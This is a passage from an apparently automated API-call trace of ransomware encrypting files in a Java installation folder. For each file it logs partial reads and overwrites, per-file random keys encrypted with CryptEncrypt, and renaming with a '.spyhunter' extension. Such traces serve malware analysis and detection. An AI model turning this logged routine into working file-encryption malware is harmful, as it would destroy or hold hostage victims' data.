dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.609] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpeg.dll") returned 49 [0174.609] StrStrW (lpFirst="jpeg.dll", lpSrch=".txt") returned 0x0 [0174.609] GetProcessHeap () returned 0x2c0000 [0174.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0174.609] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e464, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e464*=0x2800, lpOverlapped=0x0) returned 1 [0174.640] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.641] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e464, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e464*=0x2800, lpOverlapped=0x0) returned 1 [0174.641] GetProcessHeap () returned 0x2c0000 [0174.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0174.641] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.641] WriteFile (in: hFile=0xa0, lpBuffer=0x248e4a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e464, lpOverlapped=0x0 | out: lpBuffer=0x248e4a4*, lpNumberOfBytesWritten=0x248e464*=0x4, lpOverlapped=0x0) returned 1 [0174.642] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e464, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e464*=0x30, lpOverlapped=0x0) returned 1 [0174.642] CloseHandle (hObject=0xa0) returned 1 [0174.642] GetProcessHeap () returned 0x2c0000 [0174.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.642] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpeg.dll.spyhunter") returned 59 [0174.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpeg.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpeg.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpeg.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpeg.dll.spyhunter")) returned 1 [0174.643] GetProcessHeap () returned 0x2c0000 [0174.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.643] GetProcessHeap () returned 0x2c0000 [0174.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.643] GetProcessHeap () returned 0x2c0000 [0174.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20ff0 | out: hHeap=0x2c0000) returned 1 [0174.643] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4a8 | out: pbBuffer=0x248e4a8) returned 1 [0174.643] GetProcessHeap () returned 0x2c0000 [0174.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.644] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4a0*=0x30) returned 1 [0174.644] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2native.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2native.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.644] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2native.dll") returned 54 [0174.644] StrStrW (lpFirst="jp2native.dll", lpSrch=".txt") returned 0x0 [0174.644] GetProcessHeap () returned 0x2c0000 [0174.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0174.644] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e464, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e464*=0x2800, lpOverlapped=0x0) returned 1 [0174.646] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.646] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e464, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e464*=0x2800, lpOverlapped=0x0) returned 1 [0174.646] GetProcessHeap () returned 0x2c0000 [0174.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0174.646] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.646] WriteFile (in: hFile=0xa0, lpBuffer=0x248e4a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e464, lpOverlapped=0x0 | out: lpBuffer=0x248e4a4*, lpNumberOfBytesWritten=0x248e464*=0x4, lpOverlapped=0x0) returned 1 [0174.647] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e464, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e464*=0x30, lpOverlapped=0x0) returned 1 [0174.647] CloseHandle (hObject=0xa0) returned 1 [0174.647] GetProcessHeap () returned 0x2c0000 [0174.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.647] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2native.dll.spyhunter") returned 64 [0174.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2native.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2native.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2native.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2native.dll.spyhunter")) returned 1 [0174.648] GetProcessHeap () returned 0x2c0000 [0174.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.648] GetProcessHeap () returned 0x2c0000 [0174.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.648] GetProcessHeap () returned 0x2c0000 [0174.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2960 | out: hHeap=0x2c0000) returned 1 [0174.648] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4a0 | out: pbBuffer=0x248e4a0) returned 1 [0174.648] GetProcessHeap () returned 0x2c0000 [0174.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.648] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e498*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e498*=0x30) returned 1 [0174.649] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2launcher.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2launcher.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.649] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2launcher.exe") returned 56 [0174.649] StrStrW (lpFirst="jp2launcher.exe", lpSrch=".txt") returned 0x0 [0174.649] GetProcessHeap () returned 0x2c0000 [0174.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0174.649] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e45c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e45c*=0x2800, lpOverlapped=0x0) returned 1 [0174.743] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.743] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e45c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e45c*=0x2800, lpOverlapped=0x0) returned 1 [0174.743] GetProcessHeap () returned 0x2c0000 [0174.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0174.743] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.744] WriteFile (in: hFile=0xa0, lpBuffer=0x248e49c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e45c, lpOverlapped=0x0 | out: lpBuffer=0x248e49c*, lpNumberOfBytesWritten=0x248e45c*=0x4, lpOverlapped=0x0) returned 1 [0174.744] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e45c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e45c*=0x30, lpOverlapped=0x0) returned 1 [0174.744] CloseHandle (hObject=0xa0) returned 1 [0174.744] GetProcessHeap () returned 0x2c0000 [0174.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.745] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2launcher.exe.spyhunter") returned 66 [0174.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2launcher.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2launcher.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2launcher.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2launcher.exe.spyhunter")) returned 1 [0174.746] GetProcessHeap () returned 0x2c0000 [0174.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.746] GetProcessHeap () returned 0x2c0000 [0174.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.746] GetProcessHeap () returned 0x2c0000 [0174.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f640 | out: hHeap=0x2c0000) returned 1 [0174.746] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4a0 | out: pbBuffer=0x248e4a0) returned 1 [0174.746] GetProcessHeap () returned 0x2c0000 [0174.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.746] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e498*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e498*=0x30) returned 1 [0174.746] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxmedia.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxmedia.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.747] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxmedia.dll") returned 53 [0174.747] StrStrW (lpFirst="jfxmedia.dll", lpSrch=".txt") returned 0x0 [0174.747] GetProcessHeap () returned 0x2c0000 [0174.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0174.747] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e45c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e45c*=0x2800, lpOverlapped=0x0) returned 1 [0174.861] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.861] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e45c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e45c*=0x2800, lpOverlapped=0x0) returned 1 [0174.861] GetProcessHeap () returned 0x2c0000 [0174.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0174.861] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.861] WriteFile (in: hFile=0xa0, lpBuffer=0x248e49c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e45c, lpOverlapped=0x0 | out: lpBuffer=0x248e49c*, lpNumberOfBytesWritten=0x248e45c*=0x4, lpOverlapped=0x0) returned 1 [0174.870] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e45c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e45c*=0x30, lpOverlapped=0x0) returned 1 [0174.870] CloseHandle (hObject=0xa0) returned 1 [0174.870] GetProcessHeap () returned 0x2c0000 [0174.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.870] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxmedia.dll.spyhunter") returned 63 [0174.870] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxmedia.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxmedia.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxmedia.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxmedia.dll.spyhunter")) returned 1 [0174.872] GetProcessHeap () returned 0x2c0000 [0174.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.872] GetProcessHeap () returned 0x2c0000 [0174.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.872] GetProcessHeap () returned 0x2c0000 [0174.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2738 | out: hHeap=0x2c0000) returned 1 [0174.872] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e498 | out: pbBuffer=0x248e498) returned 1 [0174.872] GetProcessHeap () returned 0x2c0000 [0174.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.872] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e490*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e490*=0x30) returned 1 [0174.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JAWTAccessBridge-32.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawtaccessbridge-32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.873] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JAWTAccessBridge-32.dll") returned 64 [0174.873] StrStrW (lpFirst="JAWTAccessBridge-32.dll", lpSrch=".txt") returned 0x0 [0174.873] GetProcessHeap () returned 0x2c0000 [0174.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0174.873] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e454, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e454*=0x2800, lpOverlapped=0x0) returned 1 [0174.903] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.903] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e454, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e454*=0x2800, lpOverlapped=0x0) returned 1 [0174.903] GetProcessHeap () returned 0x2c0000 [0174.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0174.903] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.903] WriteFile (in: hFile=0xa0, lpBuffer=0x248e494*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e454, lpOverlapped=0x0 | out: lpBuffer=0x248e494*, lpNumberOfBytesWritten=0x248e454*=0x4, lpOverlapped=0x0) returned 1 [0174.921] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e454, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e454*=0x30, lpOverlapped=0x0) returned 1 [0174.921] CloseHandle (hObject=0xa0) returned 1 [0174.921] GetProcessHeap () returned 0x2c0000 [0174.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.921] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JAWTAccessBridge-32.dll.spyhunter") returned 74 [0174.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JAWTAccessBridge-32.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawtaccessbridge-32.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JAWTAccessBridge-32.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawtaccessbridge-32.dll.spyhunter")) returned 1 [0174.923] GetProcessHeap () returned 0x2c0000 [0174.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.923] GetProcessHeap () returned 0x2c0000 [0174.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.923] GetProcessHeap () returned 0x2c0000 [0174.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03748 | out: hHeap=0x2c0000) returned 1 [0174.923] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e498 | out: pbBuffer=0x248e498) returned 1 [0174.923] GetProcessHeap () returned 0x2c0000 [0174.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.924] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e490*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e490*=0x30) returned 1 [0174.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaw.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.924] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe") returned 50 [0174.924] StrStrW (lpFirst="javaw.exe", lpSrch=".txt") returned 0x0 [0174.924] GetProcessHeap () returned 0x2c0000 [0174.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0174.924] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e454, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e454*=0x2800, lpOverlapped=0x0) returned 1 [0174.925] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.925] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e454, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e454*=0x2800, lpOverlapped=0x0) returned 1 [0174.925] GetProcessHeap () returned 0x2c0000 [0174.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0174.926] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.926] WriteFile (in: hFile=0xa0, lpBuffer=0x248e494*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e454, lpOverlapped=0x0 | out: lpBuffer=0x248e494*, lpNumberOfBytesWritten=0x248e454*=0x4, lpOverlapped=0x0) returned 1 [0174.926] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e454, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e454*=0x30, lpOverlapped=0x0) returned 1 [0174.926] CloseHandle (hObject=0xa0) returned 1 [0174.926] GetProcessHeap () returned 0x2c0000 [0174.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.926] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe.spyhunter") returned 60 [0174.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaw.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaw.exe.spyhunter")) returned 1 [0174.927] GetProcessHeap () returned 0x2c0000 [0174.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.927] GetProcessHeap () returned 0x2c0000 [0174.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.927] GetProcessHeap () returned 0x2c0000 [0174.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20b20 | out: hHeap=0x2c0000) returned 1 [0174.927] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e490 | out: pbBuffer=0x248e490) returned 1 [0174.927] GetProcessHeap () returned 0x2c0000 [0174.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.927] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e488*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e488*=0x30) returned 1 [0174.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-iio.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-iio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.939] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-iio.dll") returned 55 [0174.939] StrStrW (lpFirst="javafx-iio.dll", lpSrch=".txt") returned 0x0 [0174.939] GetProcessHeap () returned 0x2c0000 [0174.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.939] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e44c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e44c*=0x2800, lpOverlapped=0x0) returned 1 [0174.941] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.941] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e44c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e44c*=0x2800, lpOverlapped=0x0) returned 1 [0174.941] GetProcessHeap () returned 0x2c0000 [0174.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.942] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.942] WriteFile (in: hFile=0xa0, lpBuffer=0x248e48c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e44c, lpOverlapped=0x0 | out: lpBuffer=0x248e48c*, lpNumberOfBytesWritten=0x248e44c*=0x4, lpOverlapped=0x0) returned 1 [0174.942] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e44c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e44c*=0x30, lpOverlapped=0x0) returned 1 [0174.942] CloseHandle (hObject=0xa0) returned 1 [0174.943] GetProcessHeap () returned 0x2c0000 [0174.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.943] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: 